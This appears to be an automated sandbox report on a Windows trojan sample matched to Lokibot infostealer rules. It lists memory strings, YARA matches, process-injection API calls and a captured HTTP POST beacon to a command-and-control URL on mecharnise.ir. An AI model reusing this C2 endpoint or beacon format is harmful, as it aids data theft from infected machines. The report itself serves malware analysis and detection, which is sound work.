22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 63 68 61 72 6e 69 73 65 2e 69 72 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 63 68 61 72 6e 69 73 65 2e 69 72 2f 22 2c 22 6e 61 6d 65 22 3a 22 6d 65 63 68 61 72 6e 69 73 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Aug 2023 03:17:10 GMTServer: Apache/2X-Powered-By: PHP/7.3.32Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://mecharnise.ir/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: User-AgentContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 66 61 2d 49 52 22 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 30 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d8 b5 d9 81 d8 ad d9 87 20 d9 be db 8c d8 af d8 a7 20 d9 86 d8 b4 d8 af 20 26 23 38 39 30 32 3b 20 6d 65 63 68 61 72 6e 69 73 65 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 5f 49 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 20 d9 be db 8c d8 af d8 a7 20 d9 86 d8 b4 d8 af 20 26 23 38 39 30 32 3b 20 6d 65 63 68 61 72 6e 69 73 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 65 63 68 61 72 6e 69 73 65 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 63 68 61 72 6e 69 73 65 2e 69 72 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 65 63 68 61 72 6e 69 73 65 2e 69 72 2f 22 2c 22 6e 61 6d 65 22 3a 22 6d 65 63 68 61 72 6e 69 73 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371809113.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mecharnise.ir/da14/fre.php
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mecharnise.ir/da14/fre.php%
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mecharnise.ir/da14/fre.phpA
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mecharnise.ir/
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mecharnise.ir/#website
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mecharnise.ir/?s=
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mecharnise.ir/comments/feed/
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mecharnise.ir/feed/
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mecharnise.ir/wp-json/
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
              Source: unknownHTTP traffic detected: POST /da14/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: mecharnise.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 544679AContent-Length: 190Connection: close
              Source: unknownDNS traffic detected: queries for: mecharnise.ir
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000000.00000002.354037165.000000000072A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

              barindex
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe PID: 1840, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe PID: 1840, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_00462CAD NtMapViewOfSection,
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_0045ECB7 VirtualAlloc,CreateProcessW,NtUnmapViewOfSection,
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_00460AB2 NtCreateSection,
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_00460121 NtQueryInformationProcess,NtQueryInformationProcess,
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_00460198 NtResumeThread,
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_00462C7A NtMapViewOfSection,
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeStatic PE information: Resource name: RT_CURSOR type: COM executable for DOS
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeStatic PE information: Resource name: RT_CURSOR type: DOS executable (COM, 0x8C-variant)
